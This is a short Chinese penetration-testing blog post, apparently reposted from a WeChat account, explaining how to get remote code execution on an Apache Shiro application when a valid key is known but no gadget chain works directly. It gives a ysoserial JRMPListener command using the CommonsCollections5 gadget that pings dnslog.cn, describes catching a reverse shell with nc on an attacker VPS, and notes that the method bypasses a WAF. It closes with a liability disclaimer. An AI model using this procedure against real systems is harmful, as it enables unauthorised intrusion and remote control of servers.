前言
最近项目测试中,发现一个shiro框架的系统,经过工具扫描发现有可用的key,但是没有能直接使用的链,于是来复习一下有key无链来rce的打法。当利用工具发现有如下的情况,就可以尝试这种打法。
场景:shiro框架,有可用key但没有可直接用的链
工具:shiro_tool.jar 和 ysoserial-0.0.6-SNAPSHOT.jar
操作步骤
java shiro_tool.jarhttp://xxx.xx
工具会帮我们探测,如果找到URLDNS可以利用dnslog来帮我们快速判断是否存在漏洞,这里我们选择JRMPClient
java -cp ysoserial-0.0.6-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1399 CommonsCollections5 "ping dnslog.cn"
然后回到shiro_tool.jar填上vps的ip和启用的端口,就可以进行rce
实战情况
通过探测发现可用key和jrmp的gadget
在vps启用工具ysoserial和监听反弹shell的nc
总结
- 需有可用key
- 可用JRMPClient
- 可绕过WAF
知识星球
原文始发于微信公众号(CatalyzeSec):实战shiro有key无链rce
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论